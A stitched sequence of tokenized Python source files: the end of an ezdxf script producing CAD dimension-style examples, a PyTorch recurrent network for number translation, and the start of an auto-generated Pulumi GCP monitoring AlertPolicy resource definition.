dxfattribs={"color":1})<line_sep># create quick a new DIMSTYLE as alternative to overriding DIMSTYLE attributes dimstyle=doc.dimstyles.duplicate_entry("EZDXF" "WITHTFILL")<line_sep># type: DimStyle dimstyle.dxf.dimtfill=1<line_sep>dimstyle.dxf.dimdec=2<line_sep>dimstyle=doc.dimstyles.duplicate_entry("WITHTFILL" "WITHTXT")<line_sep># type: DimStyle dimstyle.dxf.dimblk=ezdxf.ARROWS.closed<line_sep>dimstyle.dxf.dimtxsty="STANDARD"<line_sep>dimstyle.dxf.dimrnd=0.5<line_sep>dimstyle.set_text_align(valign="center")<line_sep>msp.add_multi_point_linear_dim(base=(0 length+2) points=points dimstyle="WITHTFILL" discard=discard )<line_sep>msp.add_multi_point_linear_dim(base=(-2 0) points=points angle=90 dimstyle="WITHTFILL" discard=discard )<line_sep>msp.add_multi_point_linear_dim(base=(10 -10) points=points angle=45 dimstyle="WITHTXT" discard=discard )<line_sep>doc.saveas(OUTDIR/f"multi_random_point_linear_dim_R2007.dxf")<block_end><def_stmt>linear_all_arrow_style version="R12" dimltype=<none> dimltex1=<none> dimltex2=<none> filename=""<block_start>""" Show all AutoCAD standard arrows on a linear dimension. Args: version: DXF version dimltype: dimension linetype dimltex1: linetype for first extension line dimltex2: linetype for second extension line filename: filename for saving """<line_sep>doc=ezdxf.new(version setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>ezdxf_dimstyle=doc.dimstyles.get("EZDXF")# type: DimStyle ezdxf_dimstyle.copy_to_header(doc)<for_stmt>index,name enumerate(sorted(ezdxf.ARROWS.__all_arrows__))<block_start>y=index<times>4<line_sep>attributes={"dimtxsty":"LiberationMono" "dimdle":0.5 }<if_stmt>dimltype<block_start>attributes["dimltype"]=dimltype<block_end><if_stmt>dimltex1<block_start>attributes["dimltex1"]=dimltex1<block_end><if_stmt>dimltex2<block_start>attributes["dimltex2"]=dimltex2<block_end>dim=msp.add_linear_dim(base=(3 y+2) p1=(0 y) p2=(3 y) dimstyle="EZDXF" override=attributes )<line_sep># type: DimStyleOverride dim.set_arrows(blk=name size=0.25)<line_sep>dim.render()<block_end><if_stmt><not>filename<block_start>filename="all_arrow_styles_dim_{}.dxf".format(version)<block_end>doc.saveas(OUTDIR/filename)<block_end><def_stmt>linear_tutorial_using_tolerances version="R2000"<block_start>""" Shows usage of tolerances for the dimension text. 
ezdxf uses MTEXT features for tolerance rendering and therefore requires DXF R2000+, but if you are using a friendly CAD application like BricsCAD, you can let the CAD application do the rendering job, be aware that these files are not AutoCAD compatible. Args: version: DXF version """<line_sep>doc=ezdxf.new(version setup=<true>)<line_sep>msp=doc.modelspace()<line_sep># DO NOT RENDER BY EZDXF for DXF R12 discard=version<eq>"R12"<line_sep>tol_style=doc.dimstyles.duplicate_entry("EZDXF" "TOLERANCE")<line_sep># type: DimStyle # not all features are supported by DXF R12: # zero suppression (DIMTZIN), align (DIMTOLJ) and dec (DIMTDEC) require DXF R2000+ tol_style.set_tolerance(0.1 hfactor=0.5 align="top" dec=2)<line_sep>msp.add_linear_dim(base=(0 3) p1=(0 0) p2=(10 0) dimstyle="tolerance").render(discard=discard)<line_sep>dim=msp.add_linear_dim(base=(0 3) p1=(15 0) p2=(15.5 0) dimstyle="tolerance")<line_sep># set tolerance attributes by dim style override dim.set_tolerance(0.1 0.15 hfactor=0.4 align="middle" dec=2)<line_sep>dim.render(discard=discard)<line_sep>doc.saveas(OUTDIR/f"dimensions_with_tolerance_{version}.dxf")<block_end><def_stmt>linear_tutorial_using_limits version="R2000"<block_start>""" Shows usage of limits for the dimension text; limits are the lower and upper limit for the measured distance, the measurement itself is not shown. ezdxf uses MTEXT features for limits rendering and therefore requires DXF R2000+, but if you are using a friendly CAD application like BricsCAD, you can let the CAD application do the rendering job, be aware that these files are not AutoCAD compatible. Args: version: DXF version """<line_sep>doc=ezdxf.new(version setup=<true>)<line_sep>msp=doc.modelspace()<line_sep># DO NOT RENDER BY EZDXF for DXF R12 discard=version<eq>"R12"<line_sep>tol_style=doc.dimstyles.duplicate_entry("EZDXF" "LIMITS")<line_sep># type: DimStyle # not all features are supported by DXF R12: # zero suppression (DIMTZIN), align (DIMTOLJ) and dec (DIMTDEC) require DXF R2000+ tol_style.set_limits(upper=0.1 lower=0.1 hfactor=0.5 dec=2)<line_sep>msp.add_linear_dim(base=(0 3) p1=(0 0) p2=(10 0) dimstyle="limits").render(discard=discard)<line_sep>msp.add_linear_dim(base=(0 3) p1=(15 0) p2=(15.5 0) dimstyle="limits").render(discard=discard)<line_sep>doc.saveas(OUTDIR/f"dimensions_with_limits_{version}.dxf")<block_end><def_stmt>linear_tutorial_using_tvp <block_start>""" For the vertical text alignment `center`, an additional DXF feature exists to move the dimension text vertically up and down (DIMTVP). 
Vertical distance dimension line to text center = text_height * vshift (DIMTVP) """<line_sep>doc=ezdxf.new("R2000" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>style=doc.dimstyles.duplicate_entry("EZDXF" "TVP")# type: DimStyle # shift text upwards style.set_text_align(valign="center" vshift=2.0)<line_sep>msp.add_linear_dim(base=(0 3) p1=(0 0) p2=(10 0) dimstyle="TVP").render()<line_sep>msp.add_linear_dim(base=(0 3) p1=(15 0) p2=(15.5 0) dimstyle="TVP").render()<line_sep>style=doc.dimstyles.duplicate_entry("EZDXF" "TVP2")# type: DimStyle # shift text downwards style.set_text_align(valign="center" vshift=-2.0)<line_sep>msp.add_linear_dim(base=(0 7) p1=(0 5) p2=(10 5) dimstyle="TVP2").render()<line_sep>msp.add_linear_dim(base=(0 7) p1=(15 5) p2=(15.5 5) dimstyle="TVP2").render()<line_sep>doc.saveas(OUTDIR/"dimensions_with_dimtvp.dxf")<block_end><def_stmt>linear_tutorial_ext_lines <block_start>doc=ezdxf.new("R12" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>msp.add_line((0 0) (3 0))<line_sep>attributes={"dimexo":0.5 "dimexe":0.5 "dimdle":0.5 "dimblk":ezdxf.ARROWS.none "dimclrt":3 }<line_sep>msp.add_linear_dim(base=(3 2) p1=(0 0) p2=(3 0) dimstyle="EZDXF" override=attributes).render()<line_sep>attributes={"dimtad":4 "dimclrd":2 "dimclrt":4 }<line_sep>msp.add_linear_dim(base=(10 2) p1=(7 0) p2=(10 0) angle=-30 dimstyle="EZDXF" override=attributes ).render()<line_sep>msp.add_linear_dim(base=(3 5) p1=(0 10) p2=(3 10) dimstyle="EZDXF" override=attributes ).render()<line_sep>doc.saveas(OUTDIR/"dim_linear_R12_ext_lines.dxf")<block_end><def_stmt>linear_EZ_M fmt<block_start>doc=ezdxf.new("R12" setup=("linetypes" "styles"))<line_sep>msp=doc.modelspace()<line_sep>ezdxf.setup_dimstyle(doc fmt)<line_sep>msp.add_line((0 0) (1 0))<line_sep>msp.add_linear_dim(base=(0 1) p1=(0 0) p2=(1 0) dimstyle=fmt).render()<line_sep>doc.saveas(OUTDIR/f"dim_linear_R12_{fmt}.dxf")<block_end><def_stmt>linear_EZ_CM fmt<block_start>doc=ezdxf.new("R12" setup=("linetypes" "styles"))<line_sep>msp=doc.modelspace()<line_sep>ezdxf.setup_dimstyle(doc fmt)<line_sep>msp.add_line((0 0) (100 0))<line_sep>msp.add_linear_dim(base=(0 100) p1=(0 0) p2=(100 0) dimstyle=fmt).render()<line_sep>doc.saveas(OUTDIR/f"dim_linear_R12_{fmt}.dxf")<block_end><def_stmt>linear_EZ_MM fmt<block_start>doc=ezdxf.new("R12" setup=("linetypes" "styles"))<line_sep>msp=doc.modelspace()<line_sep>ezdxf.setup_dimstyle(doc fmt)<line_sep>msp.add_line((0 0) (1000 0))<line_sep>msp.add_linear_dim(base=(0 1000) p1=(0 0) p2=(1000 0) dimstyle=fmt).render()<line_sep>doc.saveas(OUTDIR/f"dim_linear_R12_{fmt}.dxf")<block_end>ALL=<true><if_stmt>__name__<eq>"__main__"<block_start>example_for_all_text_placings_ucs_R12()<line_sep>example_for_all_text_placings_in_space_R12()<line_sep>example_for_all_text_placings_ucs_R2007()<line_sep>example_for_all_text_placings_in_space_R2007()<if_stmt>ALL<block_start>linear_tutorial("R2007")<line_sep>linear_tutorial_using_tvp()<line_sep>linear_tutorial_using_limits("R2000")<line_sep>linear_tutorial_using_limits("R12")<line_sep>linear_tutorial_using_tolerances("R2000")<line_sep>linear_tutorial_using_tolerances("R12")<line_sep>linear_tutorial("R2007")<line_sep>linear_tutorial("R12")<line_sep>example_background_fill("R2007")<line_sep>example_for_all_text_placings_R12()<line_sep>example_for_all_text_placings_R2007()<line_sep>example_multi_point_linear_dimension()<line_sep>example_random_multi_point_linear_dimension(count=10 length=20)<line_sep>linear_all_arrow_style("R12")<line_sep>linear_all_arrow_style("R12" dimltex1="DOT2" 
dimltex2="DOT2" filename="dotted_extension_lines_R12.dxf" )<line_sep>linear_all_arrow_style("R2000")<line_sep>linear_all_arrow_style("R2007" dimltex1="DOT2" dimltex2="DOT2" filename="dotted_extension_lines_R2007.dxf" )<line_sep>linear_tutorial_ext_lines()<line_sep>linear_EZ_M("EZ_M_100_H25_CM")<line_sep>linear_EZ_M("EZ_M_1_H25_CM")<line_sep>linear_EZ_CM("EZ_CM_100_H25_CM")<line_sep>linear_EZ_CM("EZ_CM_1_H25_CM")<line_sep>linear_EZ_MM("EZ_MM_100_H25_MM")<line_sep>linear_EZ_MM("EZ_MM_1_H25_MM")<block_end><block_end>
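All of the examples above share the same two-step pattern: create the DIMENSION with `add_linear_dim()` and then call `render()` to generate its geometry block. Condensed to its minimum (the output filename here is only an assumption), the pattern looks like this:

```python
# Minimal restatement of the add_linear_dim()/render() pattern used throughout this script.
import ezdxf

doc = ezdxf.new("R2007", setup=True)    # setup=True also creates the "EZDXF" dimstyle
msp = doc.modelspace()
msp.add_line((0, 0), (3, 0))

dim = msp.add_linear_dim(base=(3, 2), p1=(0, 0), p2=(3, 0), dimstyle="EZDXF")
dim.render()                            # required second step: creates the DIMENSION geometry BLOCK
doc.saveas("minimal_linear_dim.dxf")    # assumed output path
```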
<import_stmt>torch<import_from_stmt>..abstract ExtendedTorchModule<import_from_stmt>..layer GeneralizedLayer GeneralizedCell<class_stmt>NumberTranslationNetwork(ExtendedTorchModule)<block_start>UNIT_NAMES=GeneralizedCell.UNIT_NAMES<def_stmt>__init__ self unit_name embedding_size=2 # 1 for the number, 1 for the gate ? hidden_size=2 # 1 for the number, 1 for the gate ? dictionary_size=30 writer=<none> **kwags<block_start>super().__init__('network' writer=writer **kwags)<line_sep>self.unit_name=unit_name<line_sep>self.embedding_size=embedding_size<line_sep>self.hidden_size=hidden_size<line_sep>self.dictionary_size=dictionary_size<line_sep>self.register_buffer('lstm_zero_state_h' torch.Tensor(hidden_size))<line_sep>self.register_buffer('lstm_zero_state_c' torch.Tensor(hidden_size))<line_sep>self.register_buffer('output_zero_state' torch.Tensor(1))<line_sep>self.embedding=torch.nn.Embedding(dictionary_size embedding_size)<line_sep>self.lstm_cell=torch.nn.LSTMCell(embedding_size hidden_size)<line_sep>self.output_cell=GeneralizedCell(hidden_size 1 unit_name writer=self.writer name='recurrent_output' **kwags)<line_sep>self.reset_parameters()<block_end><def_stmt>reset_parameters self<block_start>torch.nn.init.zeros_(self.lstm_zero_state_h)<line_sep>torch.nn.init.zeros_(self.lstm_zero_state_c)<line_sep>torch.nn.init.zeros_(self.output_zero_state)<line_sep>self.embedding.reset_parameters()<line_sep>self.lstm_cell.reset_parameters()<line_sep>self.output_cell.reset_parameters()<block_end><def_stmt>forward self x<block_start>"""Performs recurrent iterations over the input. Arguments: x: Expected to have the shape [obs, time] """<line_sep># Perform recurrent iterations over the input h_1_tm1=self.lstm_zero_state_h.repeat(x.size(0) 1)<line_sep>c_1_tm1=self.lstm_zero_state_c.repeat(x.size(0) 1)<line_sep>h_2_tm1=self.output_zero_state.repeat(x.size(0) 1)<for_stmt>t range(x.size(1))<block_start>x_t=x[: t]<line_sep>h_0_t=self.embedding(x_t)<line_sep>h_1_t,c_1_t=self.lstm_cell(h_0_t (h_1_tm1 c_1_tm1))<line_sep>h_2_t=self.output_cell(h_1_t h_2_tm1)<line_sep># Reuse the previous results if x is a <pad> token h_2_t=torch.where(x[: t].view(-1 1)<eq>0 h_2_tm1 h_2_t)<line_sep># Prepare for the next iteration h_1_tm1=h_1_t<line_sep>c_1_tm1=c_1_t<line_sep>h_2_tm1=h_2_t<block_end><return>h_2_t<block_end><def_stmt>extra_repr self<block_start><return>'unit_name={}, embedding_size={}, hidden_size={}, dictionary_size={}'.format(self.unit_name self.embedding_size self.hidden_size self.dictionary_size)<block_end><block_end>
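A rough usage sketch for the network above, under two stated assumptions: `"NAC"` is only a placeholder for a valid entry of `GeneralizedCell.UNIT_NAMES`, and the import path depends on the surrounding package, so it is left as a comment:

```python
# Hedged sketch: forward a padded batch of token indices through NumberTranslationNetwork.
import torch
# from <package>.network import NumberTranslationNetwork  # actual import path depends on the package layout

network = NumberTranslationNetwork(
    unit_name="NAC",        # placeholder; must be one of GeneralizedCell.UNIT_NAMES
    embedding_size=2,
    hidden_size=2,
    dictionary_size=30,
)

# 4 sequences of 5 word tokens each; index 0 is treated as the <pad> token in forward().
x = torch.randint(low=1, high=30, size=(4, 5), dtype=torch.long)
y = network(x)              # shape [4, 1]: one predicted number per sequence
print(y.shape)
```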
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<import_from_stmt>. outputs<import_from_stmt>._inputs *<line_sep>__all__=['AlertPolicyArgs' 'AlertPolicy']<line_sep>@pulumi.input_type<class_stmt>AlertPolicyArgs<block_start><def_stmt>__init__ __self__ * combiner:pulumi.Input[str] conditions:pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]] display_name:pulumi.Input[str] documentation:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]=<none> enabled:Optional[pulumi.Input[bool]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none><block_start>""" The set of arguments for constructing a AlertPolicy resource. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input['AlertPolicyDocumentationArgs'] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. 
"""<line_sep>pulumi.set(__self__ "combiner" combiner)<line_sep>pulumi.set(__self__ "conditions" conditions)<line_sep>pulumi.set(__self__ "display_name" display_name)<if_stmt>documentation<is><not><none><block_start>pulumi.set(__self__ "documentation" documentation)<block_end><if_stmt>enabled<is><not><none><block_start>pulumi.set(__self__ "enabled" enabled)<block_end><if_stmt>notification_channels<is><not><none><block_start>pulumi.set(__self__ "notification_channels" notification_channels)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><if_stmt>user_labels<is><not><none><block_start>pulumi.set(__self__ "user_labels" user_labels)<block_end><block_end>@[email protected]<def_stmt>combiner self<arrow>pulumi.Input[str]<block_start>""" How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. """<line_sep><return>pulumi.get(self "combiner")<block_end>@combiner.setter<def_stmt>combiner self value:pulumi.Input[str]<block_start>pulumi.set(self "combiner" value)<block_end>@[email protected]<def_stmt>conditions self<arrow>pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]<block_start>""" A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. """<line_sep><return>pulumi.get(self "conditions")<block_end>@conditions.setter<def_stmt>conditions self value:pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]<block_start>pulumi.set(self "conditions" value)<block_end>@[email protected](name="displayName")<def_stmt>display_name self<arrow>pulumi.Input[str]<block_start>""" A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. """<line_sep><return>pulumi.get(self "display_name")<block_end>@display_name.setter<def_stmt>display_name self value:pulumi.Input[str]<block_start>pulumi.set(self "display_name" value)<block_end>@[email protected]<def_stmt>documentation self<arrow>Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>""" Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. """<line_sep><return>pulumi.get(self "documentation")<block_end>@documentation.setter<def_stmt>documentation self value:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>pulumi.set(self "documentation" value)<block_end>@[email protected]<def_stmt>enabled self<arrow>Optional[pulumi.Input[bool]]<block_start>""" Whether or not the policy is enabled. The default is true. 
"""<line_sep><return>pulumi.get(self "enabled")<block_end>@enabled.setter<def_stmt>enabled self value:Optional[pulumi.Input[bool]]<block_start>pulumi.set(self "enabled" value)<block_end>@[email protected](name="notificationChannels")<def_stmt>notification_channels self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` """<line_sep><return>pulumi.get(self "notification_channels")<block_end>@notification_channels.setter<def_stmt>notification_channels self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "notification_channels" value)<block_end>@[email protected]<def_stmt>project self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@project.setter<def_stmt>project self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "project" value)<block_end>@[email protected](name="userLabels")<def_stmt>user_labels self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep><return>pulumi.get(self "user_labels")<block_end>@user_labels.setter<def_stmt>user_labels self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "user_labels" value)<block_end><block_end>@pulumi.input_type<class_stmt>_AlertPolicyState<block_start><def_stmt>__init__ __self__ * combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]]=<none> creation_records:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]=<none> enabled:Optional[pulumi.Input[bool]]=<none> name:Optional[pulumi.Input[str]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none><block_start>""" Input properties used for looking up and filtering AlertPolicy resources. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. 
:param pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]] creation_records: A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input['AlertPolicyDocumentationArgs'] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[str] name: - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. 
"""<if_stmt>combiner<is><not><none><block_start>pulumi.set(__self__ "combiner" combiner)<block_end><if_stmt>conditions<is><not><none><block_start>pulumi.set(__self__ "conditions" conditions)<block_end><if_stmt>creation_records<is><not><none><block_start>pulumi.set(__self__ "creation_records" creation_records)<block_end><if_stmt>display_name<is><not><none><block_start>pulumi.set(__self__ "display_name" display_name)<block_end><if_stmt>documentation<is><not><none><block_start>pulumi.set(__self__ "documentation" documentation)<block_end><if_stmt>enabled<is><not><none><block_start>pulumi.set(__self__ "enabled" enabled)<block_end><if_stmt>name<is><not><none><block_start>pulumi.set(__self__ "name" name)<block_end><if_stmt>notification_channels<is><not><none><block_start>pulumi.set(__self__ "notification_channels" notification_channels)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><if_stmt>user_labels<is><not><none><block_start>pulumi.set(__self__ "user_labels" user_labels)<block_end><block_end>@[email protected]<def_stmt>combiner self<arrow>Optional[pulumi.Input[str]]<block_start>""" How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. """<line_sep><return>pulumi.get(self "combiner")<block_end>@combiner.setter<def_stmt>combiner self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "combiner" value)<block_end>@[email protected]<def_stmt>conditions self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]]<block_start>""" A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. """<line_sep><return>pulumi.get(self "conditions")<block_end>@conditions.setter<def_stmt>conditions self value:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]]<block_start>pulumi.set(self "conditions" value)<block_end>@[email protected](name="creationRecords")<def_stmt>creation_records self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]]]<block_start>""" A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. """<line_sep><return>pulumi.get(self "creation_records")<block_end>@creation_records.setter<def_stmt>creation_records self value:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]]]<block_start>pulumi.set(self "creation_records" value)<block_end>@[email protected](name="displayName")<def_stmt>display_name self<arrow>Optional[pulumi.Input[str]]<block_start>""" A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. """<line_sep><return>pulumi.get(self "display_name")<block_end>@display_name.setter<def_stmt>display_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "display_name" value)<block_end>@[email protected]<def_stmt>documentation self<arrow>Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>""" Documentation that is included with notifications and incidents related to this policy. 
Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. """<line_sep><return>pulumi.get(self "documentation")<block_end>@documentation.setter<def_stmt>documentation self value:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>pulumi.set(self "documentation" value)<block_end>@[email protected]<def_stmt>enabled self<arrow>Optional[pulumi.Input[bool]]<block_start>""" Whether or not the policy is enabled. The default is true. """<line_sep><return>pulumi.get(self "enabled")<block_end>@enabled.setter<def_stmt>enabled self value:Optional[pulumi.Input[bool]]<block_start>pulumi.set(self "enabled" value)<block_end>@[email protected]<def_stmt>name self<arrow>Optional[pulumi.Input[str]]<block_start>""" - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. """<line_sep><return>pulumi.get(self "name")<block_end>@name.setter<def_stmt>name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "name" value)<block_end>@[email protected](name="notificationChannels")<def_stmt>notification_channels self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` """<line_sep><return>pulumi.get(self "notification_channels")<block_end>@notification_channels.setter<def_stmt>notification_channels self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "notification_channels" value)<block_end>@[email protected]<def_stmt>project self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@project.setter<def_stmt>project self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "project" value)<block_end>@[email protected](name="userLabels")<def_stmt>user_labels self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. 
"""<line_sep><return>pulumi.get(self "user_labels")<block_end>@user_labels.setter<def_stmt>user_labels self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "user_labels" value)<block_end><block_end><class_stmt>AlertPolicy(pulumi.CustomResource)<block_start>@overload<def_stmt>__init__ __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']]]=<none> enabled:Optional[pulumi.Input[bool]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> __props__=<none><block_start>""" A description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. To get more information about AlertPolicy, see: * [API documentation](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.alertPolicies) * How-to Guides * [Official Documentation](https://cloud.google.com/monitoring/alerts/) ## Example Usage ### Monitoring Alert Policy Basic ```python import pulumi import pulumi_gcp as gcp alert_policy = gcp.monitoring.AlertPolicy("alertPolicy", combiner="OR", conditions=[gcp.monitoring.AlertPolicyConditionArgs( condition_threshold=gcp.monitoring.AlertPolicyConditionConditionThresholdArgs( aggregations=[gcp.monitoring.AlertPolicyConditionConditionThresholdAggregationArgs( alignment_period="60s", per_series_aligner="ALIGN_RATE", )], comparison="COMPARISON_GT", 